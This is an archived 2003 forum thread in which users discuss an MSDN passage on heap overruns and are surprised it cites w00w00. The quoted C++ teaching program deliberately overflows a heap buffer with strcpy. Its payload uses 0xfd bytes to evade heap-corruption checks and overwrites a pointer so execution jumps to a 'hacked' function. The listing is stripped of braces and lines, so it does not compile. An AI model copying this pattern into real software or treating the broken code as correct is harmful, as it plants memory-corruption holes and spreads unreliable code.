View Full Version : Think this is unlike Microsoft?

04-12-2003, 03:41 PM
I stumbled upon this
while at MSDN. Incase if you do not want to load the page, Here is their page:

"A heap overrun is much the same problem as a static buffer overrun, but it is more difficult to exploit.
As in the case of a static buffer overrun, attackers can write arbitrary information
into places in your application that they should not have access to.
An excellent article is "w00w00 on Heap Overflows,"
written by Matt Conover of w00w00 Security Development (WSD).
You can find this article at www.w00w00.org/files/articles/heaptut.txt.

The following application shows how a heap overrun can be exploited:"


#include <stdio.h>
#include <stdlib.h>
#include <string.h>

Very flawed class to demonstrate a problem

class BadStringBuf
m_buf = NULL;

if(m_buf != NULL)

void Init(char* buf)
//Really bad code
m_buf = buf;

void SetString(const char* input)
//This is stupid.
strcpy(m_buf, input);

const char* GetString(void)
return m_buf;

char* m_buf;

//Declare a pointer to the BadStringBuf class to hold our input.
BadStringBuf* g_pInput = NULL;

void bar(void)
printf("You have been hacked!\n");

void BadFunc(const char* input1, const char* input2)
//Someone said that heap overruns were not exploitable,
//so allocate the buffer on the heap.

char* buf = NULL;
char* buf2;

buf2 = (char*)malloc(16);
g_pInput = new BadStringBuf;
buf = (char*)malloc(16);
//Bad programmer - no error checking on allocations


//The worst that can happen is a crash, right?
strcpy(buf, input1);


printf("input 1 = %s\ninput2 = %s\n", buf, g_pInput->GetString());

if(buf != NULL)


int main(int argc, char* argv[])
//Simulated argv strings
char arg1[128];

//This is the address of the bar function.
char arg2[4] = {0x0f, 0x10, 0x40, 0};
int offset = 0x40;

//Using 0xfd is an evil trick to overcome heap corruption checking.
//The 0xfd value at the end of the buffer checks for corruption.
//No error checking here it is just an example of how to
//construct an overflow string.
memset(arg1, 0xfd, offset);
arg1[offset] = (char)0x94;
arg1[offset+1] = (char)0xfe;
arg1[offset+2] = (char)0x12;
arg1[offset+3] = 0;
arg1[offset+4] = 0;

printf("Address of bar is %p\n", bar);
BadFunc(arg1, arg2);

if(g_pInput != NULL)
delete g_pInput;

return 0;

First off, do you think that Microsoft using references to someone elses code seems like them? Second, it doesn't seem likely for them to post an article like that. I'm suprised. (Even look at the comments in the code)

04-12-2003, 11:53 PM
lol, I agree, that doesn't seem like something I'd expect to find on the MSDN...

04-13-2003, 09:42 AM
The odd thing to me is that is was written by w00w00. I don't see how MS would publish something by them...